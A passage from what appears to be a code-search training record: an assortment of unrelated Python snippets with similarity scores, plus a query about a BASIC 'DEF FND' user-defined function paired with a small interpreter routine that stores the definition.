self.kb.kb_assert(prevEmptyFact) #3\n else:\n # previous disk now on top\n # AND\n # Not above previous disk\n abovePrevStatement = Statement()\n aboveTerm = Term('?x')\n abovePrevStatement.terms = [currDisk, aboveTerm]\n abovePrevStatement.predicate = 'Above'\n for fact in self.kb.facts:\n if match(fact.statement, abovePrevStatement):\n prevDisk = fact.statement.terms[1]\n self.kb.kb_retract(fact) #7\n break\n prevonTopStatement = Statement()\n prevonTopStatement.predicate = 'onTop'\n prevonTopStatement.terms = [prevDisk, prevPeg]\n prevonTopFact = Fact(prevonTopStatement)\n self.kb.kb_assert(prevonTopFact) #8\n\n # Above next disk\n # If next not empty\n nextEmptyBool = False\n nextEmptyStatement = Statement()\n nextEmptyStatement.terms = [newPeg]\n nextEmptyStatement.predicate = 'empty'\n for fact in self.kb.facts:\n if match(fact.statement, nextEmptyStatement):\n nextEmptyBool = True\n self.kb.kb_retract(fact) #9\n break\n\n if nextEmptyBool == False:\n nextOnTopStatement = Statement()\n nextOnTopStatement.predicate = 'onTop'\n onTopTerm1 = Term('?x')\n nextOnTopStatement.terms = [onTopTerm1, newPeg]\n nextOnTopFact = Fact(nextOnTopStatement)\n for fact in self.kb.facts:\n if match(fact.statement, nextOnTopStatement):\n nextOnTop = fact.statement.terms[0]\n aboveNextStatement = Statement()\n aboveNextStatement.predicate = 'Above'\n aboveNextStatement.terms = [currDisk, nextOnTop]\n aboveNextFact = Fact(aboveNextStatement)\n self.kb.kb_assert(aboveNextFact) #6\n self.kb.kb_retract(nextOnTopFact)\n break\n\n\n\n #On top of new peg\n newonTopStatement = Statement()\n newonTopStatement.predicate = 'onTop'\n newonTopStatement.terms = [currDisk, newPeg]\n newonTopFact = Fact(newonTopStatement)\n self.kb.kb_assert(newonTopFact) #4\n\n #Not on top of previous peg\n removeonTopStatement = Statement()\n removeonTopStatement.predicate = 'onTop'\n removeonTopStatement.terms = [currDisk, prevPeg]\n removeonTopFact = Fact(removeonTopStatement)\n self.kb.kb_retract(removeonTopFact) #5\n\n\n\n\n\n #Destination not empty", "def stopUnless(self, expr, message):\r\n if not expr: self.stop(message)", "def test_skipif_true():\n pass", "def perform(self):\n if self.format_and_eval_string(self.condition):\n raise BreakException()", "def test_35_break(self):\n\t\tinput = \"\"\"function foo():integer; var a:real; begin\n\t\twhile a > 0 do\n\t\twith a:integer;b:boolean; do begin b:=true; break; end\n\t\tbreak; return 1;\n\t\tend\n\t\tprocedure main(); var x:integer; begin x:=foo(); foo(); end\"\"\"\n\t\texpect = \"Break Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,435))", "def test_02_pass(self):\n if x==1:\n pass", "def if_then(condition: Callable[[], bool], then_source: ObservableBase,\n else_source: ObservableBase = None) -> ObservableBase:\n from ..operators.observable.ifthen import if_then\n return if_then(condition, then_source, else_source)", "def syntax_for_continue():\n\n for i in range(5):\n if i % 2 == 1:\n continue\n print(i)\n\n ## Output\n # 0\n # 2\n # 4", "def splitflow(self):\n if self.name in conditional_branch:\n return True\n return False", "def test_72_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do break;\n\t\tend{with} end{with} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,472))", "def cg_if_goto(self, cmd):\n label = self.makeLabel(cmd)\n self.asm(unindent(f\"\"\"\n @SP\n AM=M-1 // SP --\n D=M // D = MEM[SP]\n @{label}\n D;JNE // if-goto {label}\n \"\"\"))", "def run(text):\n lines = text.strip(CONST.NEW_LINE).split(CONST.NEW_LINE)\n\n tabs = 0\n diff = 0\n # for multiline conditional\n total_paren_count = 0\n total_conditional_tabs_added = 0\n total_return_tabs_added = 0\n\n indent = CONST.EMPTY_STRING\n newtext = CONST.EMPTY_STRING\n tab_space = CONST.TAB\n soql_start_indent = CONST.EMPTY_STRING\n soql_end_indent = CONST.EMPTY_STRING\n\n soql_flag = False\n soql_end_flag = False\n return_flag = False\n no_semicolon_flag = False\n return_paren_flag = False\n open_bracket_flag = False\n last_line_flag = False\n conditonal_flag = False\n\n total_num_of_lines = len(lines)\n for i in range(0, total_num_of_lines):\n orig_line = lines[i]\n line = orig_line.strip()\n\n # handle comments\n if UTILS.is_line_comment(line):\n newtext += orig_line + CONST.NEW_LINE\n continue\n if len(line) == 0:\n newtext += CONST.NEW_LINE\n continue\n\n line_number = i + 1\n # soql in the same line #1\n if UTILS.soql_in_same_line(line):\n indent = tab_space*tabs\n soql_flag = False\n UTILS.preety_print_line(line_number, tabs, 1)\n\n # soql start #2\n elif soql_flag:\n indent = soql_start_indent\n\n # soql end #4\n elif soql_end_flag:\n soql_end_flag = False\n soql_end_indent = CONST.EMPTY_STRING\n soql_start_indent = CONST.EMPTY_STRING\n indent = tab_space*tabs\n\n # default indent #3\n else:\n indent = tab_space*tabs\n\n # multiline return start #5\n if line.startswith(CONST.RETURN) and line[-1] != CONST.SEMICOLON:\n return_flag = True\n tabs += 1\n total_return_tabs_added += 1\n UTILS.preety_print_line(line_number, tabs, 2)\n\n # multiline return end #6\n elif return_flag and CONST.SEMICOLON in line:\n tabs -= total_return_tabs_added\n if (\n line.strip() == '));'\n or line.strip() == ');'\n or line.strip() == '});'\n ):\n indent = tab_space*tabs\n return_flag = False\n total_return_tabs_added = 0\n UTILS.preety_print_line(line_number, tabs, 3)\n\n # multiline conditional start #9\n elif UTILS.is_multiline_loops_and_conditionals(line):\n open_paren, close_paren = (\n UTILS.get_bracket_count(\n line,\n CONST.OPEN_PARENTHESIS,\n CONST.CLOSE_PARENTHESIS\n )\n )\n conditonal_flag = True\n total_paren_count += (open_paren - close_paren)\n if line.startswith(CONST.ELSE_IF):\n tabs -= 1\n indent = tab_space*tabs\n tabs += 1\n total_conditional_tabs_added += 1\n UTILS.preety_print_line(line_number, tabs, 4)\n\n # multiline conditional end #10\n elif conditonal_flag:\n open_paren, close_paren = (\n UTILS.get_bracket_count(\n line,\n CONST.OPEN_PARENTHESIS,\n CONST.CLOSE_PARENTHESIS\n )\n )\n total_paren_count += (open_paren - close_paren)\n diff = (open_paren - close_paren)\n if diff > 0:\n tabs += 1\n total_conditional_tabs_added += 1\n elif diff < 0:\n if total_paren_count == 0:\n conditonal_flag = False\n tabs -= total_conditional_tabs_added\n total_conditional_tabs_added = 0\n if not soql_flag:\n indent = tab_space*(tabs+1)\n UTILS.preety_print_line(line_number, tabs, 5)\n\n # opening bracket line #7\n elif UTILS.is_line_has_open_bracket(line) and not soql_flag:\n if (\n UTILS.is_line_conditional_or_try_catch(line)\n ):\n tabs -= 1\n indent = tab_space*tabs\n elif line == CONST.CLOSE_PARENTHESIS + ' ' + CONST.OPEN_CURLY_BRACKET:\n open_bracket_flag = False\n tabs -= 1\n indent = tab_space*tabs\n else:\n if not no_semicolon_flag and UTILS.is_operator_start(line):\n no_semicolon_flag = True\n tabs += 1\n indent = tab_space*tabs\n tabs += 1\n if return_flag:\n total_return_tabs_added += 1\n if line[-1] == CONST.OPEN_PARENTHESIS:\n open_bracket_flag = True\n UTILS.preety_print_line(line_number, tabs, 6)\n\n # closing bracket line #8\n elif (\n line == CONST.CLOSE_PARENTHESIS + CONST.SEMICOLON\n or line == CONST.CLOSE_CURLY_BRACKET + CONST.SEMICOLON\n or line.startswith(CONST.CLOSE_PARENTHESIS)\n or line.startswith(CONST.CLOSE_CURLY_BRACKET)\n and not soql_flag\n ):\n tabs -= 1\n # if string line ends then decrease a tab\n # as it was set earlier\n if no_semicolon_flag and line[-1] == CONST.SEMICOLON:\n tabs -= 1\n no_semicolon_flag = False\n if return_flag:\n total_return_tabs_added -= 1\n indent = tab_space*tabs\n # if line != CONST.CLOSE_PARENTHESIS:\n open_bracket_flag = False\n UTILS.preety_print_line(line_number, tabs, 7)\n\n # rest of the line #11\n elif (\n not return_flag\n and not soql_flag\n and not UTILS.start_soql_query(line)\n and not UTILS.is_character_in_quotes(line, CONST.SEMICOLON)\n and not UTILS.is_line_keywords(line)\n ):\n indent = tab_space*tabs\n if (\n line[-1] != CONST.SEMICOLON\n and not no_semicolon_flag\n and (UTILS.is_operator_start(line) or UTILS.is_operator_end(line))\n ):\n no_semicolon_flag = True\n tabs += 1\n if UTILS.is_operator_start(line):\n indent = tab_space*tabs\n elif no_semicolon_flag and line[-1] == CONST.SEMICOLON:\n no_semicolon_flag = False\n tabs -= 1\n elif UTILS.is_operator_start(line) and line[-1] == CONST.SEMICOLON:\n indent = tab_space*(tabs+1)\n elif open_bracket_flag and line[-1] == CONST.SEMICOLON:\n tabs -= 1\n open_bracket_flag = False\n # else:\n # if not no_semicolon_flag:\n # tabs += 1\n # no_semicolon_flag = True\n UTILS.preety_print_line(line_number, tabs, 8)\n else:\n #indent = tab_space*tabs\n print('🤷🤷‍♀️🤷‍🙄🙄🙄 {}'.format(str(line_number)))\n\n newline = indent + line.rstrip()\n newtext += newline + CONST.NEW_LINE\n\n # if the soql ends in same line then don't set the flags\n if UTILS.start_soql_query(line) and UTILS.end_soql_query(line):\n continue\n\n # handle multiline soql line\n if not UTILS.soql_in_same_line(newline) and UTILS.start_soql_query(newline):\n # find the position in line\n square_bracket_index = 0\n soql_flag = True\n if ': [' in newline:\n square_bracket_index = newline.index(': [') + 4\n elif '= [' in newline:\n square_bracket_index = newline.index('= [') + 4\n elif '([' in newline:\n square_bracket_index = newline.index('([') + 3\n # next lines indent would be indent + diff\n if not soql_start_indent:\n diff = square_bracket_index - len(soql_start_indent) - 1\n else:\n diff = square_bracket_index - len(indent)\n soql_start_indent += (CONST.NEW_STRING * diff) #+ tab_space\n\n # handle soql end line\n if (\n '])' in newline\n or '];' in newline\n or ')];' in newline\n ):\n soql_flag = False\n soql_end_flag = True\n new_len = len(indent)-diff\n soql_end_indent = CONST.NEW_STRING * new_len\n\n # Handle unindented lines\n if (\n line_number != total_num_of_lines\n and not last_line_flag\n and tabs == 0\n ):\n print('😱😱😱😱😱😱😱😱😱😱')\n UTILS.preety_print_line(line_number, tabs, -1)\n print('👽👽👽👽👽👽👽👽👽👽')\n last_line_flag = True\n\n # remove the last '\\n'\n newtext = newtext[:-1]\n if tabs == 0:\n print('\\n🙀🐾If I fits, I sits🐾🐈')\n else:\n print('\\n🏇🔫🤖Indentation not done properly.🤖🔫🏇')\n return newtext", "def ready_to_proceed(self):\n if self.current_step is None or self.step_position == StepPosition.Before:\n return False\n\n for condition, _ in self.current_step.conditions:\n if condition.satisfied():\n return True\n return False", "def skipIf(condition, reason):\r\n if condition:\r\n return skip(reason)\r\n return _id" ]
[ "0.6381344", "0.6276441", "0.6248517", "0.6244961", "0.62422997", "0.61599344", "0.6136429", "0.6136429", "0.5794875", "0.5792966", "0.575992", "0.57597315", "0.5758323", "0.5756217", "0.573461", "0.56686", "0.5654149", "0.5635589", "0.5634545", "0.563404", "0.5616345", "0.5601915", "0.55984026", "0.5582077", "0.5566953", "0.5562973", "0.55500007", "0.55444866", "0.55400145", "0.5538579", "0.55090374", "0.5503659", "0.5494274", "0.54169255", "0.5401358", "0.53924596", "0.5387151", "0.53868914", "0.53790534", "0.5372475", "0.5368965", "0.53685147", "0.53615886", "0.53567946", "0.53489697", "0.5322286", "0.53163266", "0.5314488", "0.53074825", "0.5301719", "0.5289654", "0.5273167", "0.5270293", "0.5231625", "0.52294654", "0.52289724", "0.52187324", "0.5217503", "0.5204851", "0.5199182", "0.5193867", "0.5177218", "0.5169233", "0.5153155", "0.514452", "0.5142351", "0.513704", "0.51342666", "0.51342666", "0.51342666", "0.51342666", "0.5129158", "0.5124027", "0.51175416", "0.51015025", "0.50934756", "0.5092529", "0.5090652", "0.5079576", "0.5079576", "0.50795174", "0.5064467", "0.5056287", "0.505537", "0.50524217", "0.5037574", "0.5024883", "0.50213397", "0.50196487", "0.50076085", "0.50007665", "0.4988471", "0.49834934", "0.49762583", "0.49658078", "0.49576542", "0.49571732", "0.49568102", "0.49556482", "0.4951415" ]
0.741904
0
Define a userdefined function. 470 DEF FND(D)=SQR((K(I,1)S1)^2+(K(I,2)S2)^2)
def stmt_def(executor, stmt:ParsedStatementDef): executor.put_symbol(stmt._variable, stmt._tokens, SymbolType.FUNCTION, stmt._function_arg)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dmy_fn(x):\n return 0.4*(2.0*(np.exp(x*4) + np.exp(-x*4)) - 8 + 0.6*x - 6*x**2)", "def calculate_fn_value(self) :\r\n\r\n self.fn_value = self.gn_value + self.hn_value #f(n) = g(n) + h(n)\r", "def d2f2dx1x5_func(self,X):\n return(\n -(self.rj**2)*self.rm*self.k_spr*(self.b_spr**2) * (\n np.exp(self.b_spr*(self.rm*X[4] + self.rj*X[0]))\n * ((self.rm*X[4] + self.rj*X[0])>=0)\n ) / self.Ij\n )", "def fval_function(sN, weight):\r\n # IMPLEMENT\r\n\r\n # Many searches will explore nodes (or states) that are ordered by their f-value.\r\n # For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\r\n # You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\r\n # The function must return a numeric f-value.\r\n # The value will determine your state's position on the Frontier list during a 'custom' search.\r\n # You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\r\n\r\n\r\n return (1 - weight) * sN.gval + weight * sN.hval", "def func_ludwigson(eps,k1,n1,k2,n2,):\n return k1*eps**n1+np.exp(k2+n2*eps)", "def mul_fns(f_and_df, g_and_dg):\n \"*** YOUR CODE HERE ***\"", "def f(x, a, d1, d2):\n A = 10*a\n D1 = 10*d1\n D2 = 10*d2\n y = e * (frequency) * (1e9) * ( np.exp(-np.exp(-A*x+D1)) + np.exp(-np.exp(-A*x+D2)) + N)\n return y", "def df2dx5_func(self,X):\n result = (\n -self.rj*self.rm*self.k_spr*self.b_spr * (\n np.exp(self.b_spr*(self.rm*X[4] + self.rj*X[0]))\n * ((self.rm*X[4] + self.rj*X[0])>=0)\n ) / self.Ij\n )\n return(result)", "def SIDFT(X,D):\n N=len(X)\n x=np.zeros(N,'complex')\n for n in range(0,N,1):\n for k in range(0,N,1):\n x[n]=x[n]+np.exp(-1j*2*np.pi*k*D/N)*X[k]*np.exp(1j*2*np.pi*k*n/N)\n return x/N", "def fval_function(sN, weight):\n#IMPLEMENT\n \n #Many searches will explore nodes (or states) that are ordered by their f-value.\n #For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\n #You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\n #The function must return a numeric f-value.\n #The value will determine your state's position on the Frontier list during a 'custom' search.\n #You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\n return 0", "def f(self, (k,t), (J,q,dq), **params):\n f = 0.*q\n return f", "def ffn(input, d_hid, d_size, name=\"ffn\"):\n hidden = fluid.layers.fc(input=input,\n size=d_hid,\n num_flatten_dims=1,\n param_attr=fluid.ParamAttr(name=name + '_innerfc_weight'),\n bias_attr=fluid.ParamAttr(\n name=name + '_innerfc_bias',\n initializer=fluid.initializer.Constant(0.)),\n act=\"leaky_relu\")\n #return hidden\n out = fluid.layers.fc(input=hidden,\n size=d_size,\n num_flatten_dims=1,\n param_attr=fluid.ParamAttr(name=name + '_outerfc_weight'),\n bias_attr=fluid.ParamAttr(\n name=name + '_outerfc_bias',\n initializer=fluid.initializer.Constant(0.)))\n return out", "def f1(x):\n return x**3 - 2*x + 2", "def f_2(c):\n Di = calc_R(*c)\n return Di", "def my_fn(x):\n return 0.4*(0.5*(np.exp(x*4) - np.exp(-x*4)) - 8*x + 0.3*x**2 - 2*x**3 + 0.8)", "def fn(x):\n\n # coefficients\n A = 728.0\n B = 0.317\n C = 0.486\n D = -8.99 * 1.6\n\n # function\n fx = - D / x**2 - A / B * math.exp(- x / B) + 6 * C / x**7\n\n return fx", "def func1(x,u):\r\n return 5*x*u+(x+7)*np.sin(x)", "def func(x,D,a):\n return D*x**a", "def dalf(x):\n return grad(alf)(x)", "def gradFun(self, S, x):", "def f2n(f):\n k = 4.0 * np.pi**2 * codata.value('electron mass') * codata.value('electric constant') / codata.value('elementary charge')**2\n return k * f**2", "def grad_f3(x):\n pass", "def get_func(k_center,enk,I,gamma,gamma_k):\n\n def lorentzian_k(k):\n return 1./np.pi * gamma_k / ( (k-k_center)**2 + gamma_k**2)\n\n def lorentzian(k,omega):\n return I * gamma / ( (omega-enk)**2 + gamma**2) * lorentzian_k(k)\n\n return lorentzian", "def function(self):\r\n lambd = 5*np.sin(2*np.pi*self.x_array) #The function in question\r\n return 3*np.pi*np.exp(-lambd)", "def F(x):\n return math.exp(-0.5 * (x ** 2))", "def F(self, (k,t), (j,x), **params):\n d = len(x)/2\n q,dq = x[:d],x[d:]\n J = j\n M = self.M( (k,t), (J,q,dq), **params )\n f = self.f( (k,t), (J,q,dq), **params )\n c = self.c( (k,t), (J,q,dq), **params )\n Da = self.Da( (k,t), (J,q), **params )\n Db = self.Db( (k,t), (J,q), **params )\n D = np.vstack((Da,Db))\n lambda_ = self.lambda_( (k,t), (J,q,dq), **params )\n ddq = util.dot( la.inv(M), f + util.dot(c,dq) + util.dot(lambda_, D) )\n dx = np.hstack((dq,ddq))\n return dx", "def d2f2dx1x3_func(self,X):\n return(\n -(self.rj**2)*self.rm*self.k_spr*(self.b_spr**2) * (\n np.exp(self.b_spr*(self.rm*X[2] - self.rj*X[0]))\n * ((self.rm*X[2] - self.rj*X[0])>=0)\n ) / self.Ij\n )", "def n2f(n):\n k = 4.0 * np.pi**2 * codata.value('electron mass') * codata.value('electric constant') / codata.value('elementary charge')**2\n return np.sqrt(n/k)", "def my_square(d):asaasasassssssssssssssssssssssssss\n\t return (d ** 3)", "def f(k):\n return k * k * k * k * pk(k, suppression) * spherical_jn(2, k * r)", "def F(k0):\r\n assert((not np.any(np.isnan(k0))) and np.all(np.isfinite(k0)) and\r\n np.all(np.isreal(k0))),\\\r\n \"k0 must be real, finite and not NaN\"\r\n assert(len(k0) == 4), \"K must have length 4\"\r\n assert(hasattr(F, '__call__')), \\\r\n \"F must be a callable function\"\r\n k1 = np.array([k0[0], k0[1]])\r\n k2 = np.array([k0[2], k0[3]])\r\n f1 = k1 - np.array([f(t + dt / 3,\r\n qn + (dt / 12) * (5 * k1 - k2), r, e, w)])\r\n f2 = k2 - np.array([f(t + dt,\r\n qn + (dt / 4) * (3 * k1 + k2), r, e, w)])\r\n f3 = np.reshape(np.array([f1, f2]), (4,))\r\n return f3", "def f(k):\n return k * k * pk(k, suppression) * spherical_jn(0, k * r)", "def f(k):\n return k * k * k * pk(k, suppression) * spherical_jn(1, k * r)", "def func(x, f, fp):\n\n return np.sqrt((1+fp(x)**2) / (2 * g * f(x)))", "def _partial_derivative_f2(self, f1, f2, m_star, n):\r\n if f1 > 0 and f2 > 0:\r\n a_0 = self._calculate_a_0(f1, f2, n)\r\n term1 = (f1 ** 2) * (1 - a_0 ** m_star)\r\n term2 = 2 * (f2 ** 2)\r\n term3 = (m_star * f1) * (a_0 ** (m_star - 1))\r\n term4 = n * f2\r\n return 1 - (term1 / term2) + (term3 / term4)\r\n else:\r\n a_1 = self._calculate_a_1(f1, f2, n)\r\n term1 = (m_star * f1) * a_1 ** (m_star - 1)\r\n term2 = n * (f2 + 1)\r\n term3 = (f1 * (f1 - 1)) * (1 - a_1 ** m_star)\r\n term4 = 2 * (f2 + 1) ** 2\r\n return 1 + (term1 / term2) - (term3 / term4)", "def shape_function_deriv(self, idx, x):\n if idx == 0:\n return -0.5\n elif idx == 1:\n return 0.5\n elif idx == 2:\n return 2*x*sqrt(3./2)/2\n elif idx == 3:\n return (3*x**2-1)*sqrt(5./2)/2\n elif idx == 4:\n return (20*x**3-12*x)*sqrt(7./2)/8\n elif idx == 5:\n return (28*x**3-20*x)*sqrt(9./2)/8\n elif idx == 6:\n return (126*x**5-140*x**3+30*x)*sqrt(11./2)/16\n elif idx == 7:\n return (198*x**5-252*x**3+70*x)*sqrt(13./2)/16\n elif idx == 8:\n return (3432*x**7-5544*x**5+2520*x**3-280*x)*sqrt(15./2)/128\n elif idx == 9:\n return (-840*x + 5544*x**3 - 10296*x**5 + 5720*x**7)*sqrt(17./2)/128\n elif idx == 10:\n return (630*x - 9240*x**3 + 36036*x**5 - 51480*x**7 + 24310*x**9)*sqrt(19./2)/256\n raise NotImplementedError(\"Such shape function is not implemented yet (i=%d)\" % i)", "def dfdx(self, X):\n \n return 3*(X[0])**2", "def get_stream_function_doublet(strength, xd, yd, X, Y):\n psi = - strength / (2 * math.pi) * (Y - yd) / ((X - xd) ** 2 + (Y - yd) ** 2)\n\n return psi", "def f(k):\n return k * k * k * k * pk(k, suppression) * spherical_jn(0, k * r)", "def f2(x):\n return x**2 + 2 * x + 1", "def f4(x):\n return sin(x)/x", "def compute_f_CHEN(self, R, e, D):\n upper_RHS_LHS = e/D\n lower_RHS_LHS = 3.7065\n \n log_square = log((((upper_RHS_LHS)**1.1096)/2.8257) + (7.149/R)**0.8961, 10)\n LHS_RHS_RHS = (5.0452/R) * log_square\n \n curly_bracket = (upper_RHS_LHS / lower_RHS_LHS) - LHS_RHS_RHS\n \n RHS = (-4)*log(curly_bracket, 10)\n f = (1/RHS)**2\n\n return f", "def dnde_photon_spectrum_fns(\n self,\n) -> Dict[str, Callable[[Union[float, npt.NDArray[np.float64]], float], float]]:\n\n def dnde_zero(e, _: float):\n return np.zeros_like(e)\n\n def wrap(f):\n @functools.wraps(f)\n def fnew(*args, **kwargs):\n return f(self, *args, **kwargs)\n\n return fnew\n\n return {\n \"e e\": wrap(dnde_photon_e_e),\n \"mu mu\": wrap(dnde_photon_mu_mu),\n \"ve ve\": dnde_zero,\n \"vt vt\": dnde_zero,\n \"vm vm\": dnde_zero,\n \"pi pi\": wrap(dnde_photon_pi_pi),\n \"k0 k0\": wrap(dnde_photon_k0_k0),\n \"k k\": wrap(dnde_photon_k_k),\n \"pi0 gamma\": wrap(dnde_photon_pi0_gamma),\n \"eta gamma\": wrap(dnde_photon_eta_gamma),\n \"pi0 phi\": wrap(dnde_photon_pi0_phi),\n \"eta phi\": wrap(dnde_photon_eta_phi),\n \"eta omega\": wrap(dnde_photon_eta_omega),\n \"pi0 pi0 gamma\": wrap(dnde_photon_pi0_pi0_gamma),\n \"pi pi pi0\": wrap(dnde_photon_pi_pi_pi0),\n \"pi pi eta\": wrap(dnde_photon_pi_pi_eta),\n \"pi pi etap\": wrap(dnde_photon_pi_pi_etap),\n \"pi pi omega\": wrap(dnde_photon_pi_pi_omega),\n \"pi0 pi0 omega\": wrap(dnde_photon_pi0_pi0_omega),\n \"pi0 k0 k0\": wrap(dnde_photon_pi0_k0_k0),\n \"pi0 k k\": wrap(dnde_photon_pi0_k_k),\n \"pi k k0\": wrap(dnde_photon_pi_k_k0),\n \"pi pi pi pi\": wrap(dnde_photon_pi_pi_pi_pi),\n \"pi pi pi0 pi0\": wrap(dnde_photon_pi_pi_pi0_pi0),\n \"v v\": wrap(dnde_photon_v_v),\n }", "def FN2(lam):\n return 1.034 + 3.17 *1e-4 *lam**(-2)", "def ddalf(x):\n return dalf_spl.derivatives(x)[1]", "def calcSfb(Idc,I3, R, Tj,g1,g2,g3):\n t = np.linspace(0, 1, 1000, endpoint=False)\n It = Idc[:, None]+I3*np.cos(2*np.pi*t[None, :])\n St = qnoise_fit.Sii(It, R, Tj)\n Dt = qnoise_fit.dSiidV(It, R, Tj)\n S0 = qnoise_fit.Fcoef(St, t, 0)\n D3 = qnoise_fit.Fcoef(Dt, t, 1)[0]\n S3 = qnoise_fit.Fcoef(St, t, 1)[0]\n D0 = qnoise_fit.Fcoef(Dt, t, 0)\n D6 = qnoise_fit.Fcoef(Dt, t, 2)[0]\n return g1*S0*D3+g2*S3*D0+g3*D6*S3", "def _partial_derivative_f1(self, f1, f2, m_star, n):\r\n if f1 > 0 and f2 > 0:\r\n a_0 = self._calculate_a_0(f1, f2, n)\r\n term1 = (m_star * a_0 ** (m_star - 1)) / n\r\n term2 = (f1 * (1 - a_0 ** m_star)) / f2\r\n return 1 - term1 + term2\r\n else:\r\n a_1 = self._calculate_a_1(f1, f2, n)\r\n term1 = (m_star * f1) * a_1 ** (m_star - 1)\r\n term2 = n * (f1 - 1)\r\n term3 = (f1 - 1) * (1 - a_1 ** m_star)\r\n term4 = 2 * (f2 + 1)\r\n term5 = f1 * (1 - a_1 ** m_star)\r\n return 1 - (term1 / term2) + (term3 / term4) + (term5 / term4)", "def richards_equation(x, s, gradient, kfun):\n return -kfun(x, s) * (gradient + 1)", "def F_std_coeff(d):\n return (d ** 2 - 1) / 4", "def constant_equation(funct):\n return funct + \"x\"", "def F(cst, x):\n [u0, v0, u1, v1, u2, v2, coeffs] = cst\n [u, v, g1, g2, g3] = x\n a = g1*u1 - u0\n b = g2*u2 - u0\n c = g3*u - u0\n l = g1*v1 - v0 \n m = g2*v2 - v0\n n = g3*v - v0\n r = g1 - 1\n s = g2 - 1\n t = g3 - 1\n return np.array([\n coeffs[0]*(a**2-l**2) + 2*coeffs[1]*(a*b-l*m) + coeffs[2]*(b**2-m**2) + 2*coeffs[3]*(a*c-l*n) + 2*coeffs[4]*(b*c-m*n) + c**2 - n**2,\n coeffs[0]*(l**2-r**2) + 2*coeffs[1]*(l*m-r*s) + coeffs[2]*(m**2-s**2) + 2*coeffs[3]*(l*n-r*t) + 2*coeffs[4]*(m*n-s*t) + n**2 - t**2,\n coeffs[0]*a*l + coeffs[1]*(l*b+m*a) + coeffs[2]*m*b + coeffs[3]*(l*c+n*a) + coeffs[4]*(m*c+b*n) + c*n,\n coeffs[0]*a*r + coeffs[1]*(r*b+s*a) + coeffs[2]*s*b + coeffs[3]*(r*c+t*a) + coeffs[4]*(s*c+b*t) + c*t,\n coeffs[0]*r*l + coeffs[1]*(l*s+m*r) + coeffs[2]*m*s + coeffs[3]*(l*t+n*r) + coeffs[4]*(m*t+s*n) + t*n \n ])", "def FD(f, s, p, d=1, z=1, m=1, dx=1e-6, gmix=False, k=['All']):\n if k == ['All']:\n ph = 't'\n cph = 'x'\n else:\n ph = k[0]\n cph = k[0]\n \n if d == 1:\n s.c[z][cph] += 0.5*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f1 = f(s, p).m['g_mix'][ph]\n else:\n f1 = f(s, p)\n \n s.c[z][cph] -= 1.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f2 = f(s, p).m['g_mix'][ph]\n else:\n f2 = f(s, p)\n \n return (f1 - f2)/dx\n \n if d == 2:\n s.c[z][cph] += 1.0*dx\n s.c[m][cph] += 1.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f1 = f(s, p).m['g_mix'][ph]\n else:\n f1 = f(s, p)\n \n s.c[m][cph] -= 2.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f2 = f(s, p).m['g_mix'][ph]\n else:\n f2 = f(s, p)\n \n s.c[z][cph] -= 2.0*dx\n s.c[m][cph] += 2.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f3 = f(s, p).m['g_mix'][ph]\n else:\n f3 = f(s, p)\n \n s.c[m][cph] -= 2.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f4 = f(s, p).m['g_mix'][ph]\n else:\n f4 = f(s, p)\n \n return (f1 - f2 - f3 + f4)/(4.0*dx*dx)", "def fdq2(f, x, h=1e-5):\n return (-3*f(x) + 4*f(x+h) - f(x+2*h))/(2*h)\n raise NotImplementedError(\"Problem 2 Incomplete\")", "def steffensen ( fun , x , fx = None , args = () ) :\n \n if fx is None : fx = float ( fun ( x , *args ) ) ## reuse if already calculated\n if fx : \n gx = ( fun ( x + fx , *args ) - fx ) / fx\n if gx : return x - fx / gx", "def F(x):\n soln = x - (1.0/5.0)*math.cos(10.0*x+1.0) \n return soln", "def derivert(f, k):\r\n \r\n return(k*f)", "def compute_fk(self, sigma, sigma_des, C, offset):\n if sigma >= sigma_des:\n # push robot away\n f = -((sigma - sigma_des) ** 2)/C + offset\n elif sigma < sigma_des:\n # pull robot in\n f = ((sigma - sigma_des) ** 2)/C + offset\n else:\n f = 0\n return f", "def fkine_ur5(q):\n \n \n T1 = dh(0.08916, +q[0], 0.0, +pi/2)\n T2 = dh( 0.0, +q[1], -0.425, 0.0)\n T3 = dh( 0.0, +q[2], -0.392, 0.0)\n T4 = dh(0.10915, +q[3], 0.0, +pi/2)\n T5 = dh(0.09465, +pi+q[4], 0.0, +pi/2)\n T6 = dh( 0.0823, +pi+q[5], 0.0, 0.0)\n \n # Efector final con respecto a la base\n T = np.dot(np.dot(np.dot(np.dot(np.dot(T1,T2),T3),T4),T5),T6)\n return T", "def _f(X, g, n):\n if n == 3:\n n = 3.001 # for numerical stability\n hyp2f1_term = hyp2f1((n-1)/2, g/2, n/2, 1/(1+X**2))\n beta_term = beta((n-1)/2, 0.5)\n return 0.5 * beta_term * hyp2f1_term * (1+X**2) ** ((1-n)/2)", "def f3(x):\n return 1 / (1 + x**2)", "def dfda(x: np.array) -> 